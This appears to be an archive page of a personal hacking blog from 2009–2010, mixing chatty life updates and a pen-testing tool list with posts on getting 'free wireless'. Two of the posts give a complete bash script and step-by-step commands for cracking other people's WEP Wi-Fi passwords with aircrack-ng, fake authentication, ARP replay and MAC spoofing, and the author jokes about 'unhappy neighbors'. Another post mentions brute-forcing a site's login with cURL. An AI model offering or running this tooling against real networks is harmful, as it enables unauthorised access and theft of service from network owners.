Archive

Posts Tagged ‘hack’

Magic June

June 22nd, 2010 Albertux 9 comments

Magic June

48 61 63 6b 20 54 68 65 20 50 6c 61 6e 65 74

Many changes in this month.

I was go to Hacker Dojo. I meet Rob Brown a Javascript hacker, he develop this great tool: Aardvark


function currentTime() {
    currentTime = new Date();
    return {
        year: currentTime.getFullYear(),
        month: currentTime.getMonth() + 1,
        day: currentTime.getDate()
    };
}
 
now = currentTime();
 
if ( ( now.day == 14 ) && ( now.month == 6 ) && ( now.year == 2010 ) ){
    Albertux.prototype.age = 26; // Another year of life.
}

I always like hamburger with fries inside:

Pictures and videos for me:



I’m not EMO!!!

Now I’m working on 2 projects as outsourcing for a moment:

I do some stuff from rrripple for free, why calling me ? and asking me to do a specific schedule, but anyway the bugs I discover are here:

Duplicate items (not validation):

Percent go crazy after upload something.

Download Videos:

You need VLC to watch this videos

The bugs I discover not watching the source code, only using the application Firefox with firebug and use cURL to show the brute force login and only using the application less than a hour.

But there are good news:

Tech Crunch Review from rrripple.com

My personal comment:

I never work for free, sucks, sucks, sucks.

Library Pics

You know I always follow the rules

My Job for a moment is seeking Job hahahaha XD

And June is almost over but not yet.

More Codes, Hacks and Girls in the next Post.

Categories: personal, security Tags: , ,

Samurai Linux

April 10th, 2010 Albertux No comments

Talking with Preth00nker, says check Samurai Distro (Oriented to pen-testing Web Applications)

Link: http://samurai.inguardians.com/

Categories: security, unix/linux, web Tags:

Insecurity

April 1st, 2010 Albertux No comments

Insecurity

Tools:
Nikto.pl Web Scanner
nmap Network Scanner
Metasploit Framework
wfuzz Brute Force Web App
Wireshark Network Protocol Analyzer
Snort IDS
Nessus (vulnerability scanner)
Hydra Cracker Password
John the Ripper Cracker Password (Passive)

Linux Distros:
BackTrack Wireless Tools and others
Damn Vulnerable Linux

Others:
http://sectools.org/
http://www.milw0rm.com/
http://www.exploit-db.com/
http://www.securityfocus.com/

Categories: network, security, unix/linux, web, windows Tags: ,

Wireless Hack Bash Script

August 23rd, 2009 Albertux 2 comments

Wireless Hack Bash Script

#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHTBORS
#
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
 
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
 
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
 
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
	run_like_a_root "airmon-ng stop mon0"
	run_like_a_root "/etc/init.d/networking restart"
	run_like_a_root "NetworkManager"
	exit 1
fi
 
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
	WDEVICE=wlan0 # Could be diferrent on your notebook
else
	WDEVICE=$1 # Set Wireless Device
fi
 
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
 
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
 
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
 
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
 
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
 
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
 
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
 
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
 
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
 
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
 
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
 
# Wait some time ...
echo "Press any kay to launch aircrack-ng (30,000+ on data recommended)"
read
 
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
 
exit 0

Free Wireless on Ubuntu 9.04

Categories: network, security, unix/linux Tags: , ,

Free Wireless on Ubuntu 9.04

August 12th, 2009 Albertux No comments

Free Wireless

Using Ubuntu 9.04:

sudo apt-get install aircrack-ng macchanger

The device name could be different on your machine

sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0
sudo ifconfig wlan0 down
sudo ifconfig mon0 down
sudo macchanger -m $FAKEMAC wlan0
sudo macchanger -m $FAKEMAC mon0
sudo ifconfig mon0 up
sudo airodump-ng mon0 # See all available networks choose one channel

Inject packets:

# terminal 01
 sudo airodump-ng mon0 -w wdata -c 6 --bssid  00:00:00:00:00:00 # -c $CHANNEL
# terminal 02
watch sudo aireplay-ng -1 0 -e $SSID -a 00:00:00:00:00:00 -h $FAKEMAC mon0
# terminal 03
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h $FAKEMAC mon0
# wait some time to get 30,000 on Data on terminal 01

Now get the password:

sudo aircrack-ng wdata-*.cap

See Screens:

Categories: network, security, unix/linux Tags: , ,